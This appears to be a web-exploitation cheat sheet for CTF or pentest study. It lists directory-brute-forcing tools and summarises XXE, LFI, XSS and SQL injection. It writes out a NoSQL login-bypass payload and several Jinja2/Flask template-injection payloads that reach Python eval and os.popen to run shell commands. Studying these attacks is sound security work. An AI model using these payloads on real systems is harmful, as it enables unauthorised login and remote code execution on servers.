- PayloadAllTheThings Github
- Postman
- Insomia
- dirb (run dirb on terminal)
- dirbuster (requires GUI)
- gobuster (similar tool)
- dirsearch(faster alternative to dirb) GitHub
- dirhunt GitHub
- Burp Suite (requires GUI) Website
- wget
- Happens when an application parses uses data from XML files which can be modified to be malicious Website
- Commonly found in PHP web application (maybe through Wordpress plugins etc)
- Vulnerable websites can allow you to access local files through directory traversal
- Look out for ways where you can supply a file path and it is served as a download/printed to the page
- Stored XSS
Website uses external resources that contains malicious code
If an SVG with XSS payload is in an iframe or embed of a website, it can be executed
- Reflected XSS
When queries to a website is handled and returned in an unsafe way
- DOM based XSS
Client side attack, browser executes payload that didn't came from the server
- Try using one (single or double) quote for the input and see if there is any errors
- If an error is returned, the website might be vulnerable
- Union based attack
Application displays the output of the query, allowing you to steal information from the database
- Error based attack
Application returns an error with details about the query, helping you to craft queries to bypass checks
- Resources
- In MongoDB + NodeJS web apps
Query for login details
db.users.find({username: username, password: password});Malicious input
{
"username": {"$gt": ""},
"password": {"$gt": ""}
}
{"$gt": ""} will result in true, $gt is a query selector which compares with ""
- Make sure input gets sanitised as string
- Remove $ and . to prevent query selectors
{{ 7*'7' }}
Twig: 49
Jinja2: 7777777
{{ 7 }}
Golang: 7
For Flask servers:
Get config:
{{config}}
Python RCE:
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('<Python code here>') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}Execute shell statements:
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("<SHELL STATEMENT HERE>").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}Get all classes:
{{ ''.__class__.__mro__[2].__subclasses__() }}Get local/global variables (from Python RCE)
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('dict(globals(), **locals())') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}For golang:
{{.<variable or function here>}}
Note that the dot is important.
- Reference/more info GitHub / Translated Version
- Payload for more languages Website
- Payload all the things SSTI Github
- Steps to test for CSRF Guide
- Steps to test for Broken Authentication Guide
.htaccessfiles are configuration files for its directory
- bWAPP, a free and open source deliberately insecure web application Website
- Article explainling various common python application pitfalls which can be exploited Website
robots.txtcontains information for crawlers to know which files and directories it has permission to check, this could potentially show hidden filessitemap.xmlcontains infomation about the pages a site has to help search engines crawl and index through the website faster
- Pacu, a web exploitation framework for exploiting configuration flaws in AWS servers GitHub
- Flask Unsign [Python Tool]](https://pypi.org/project/flask-unsign/)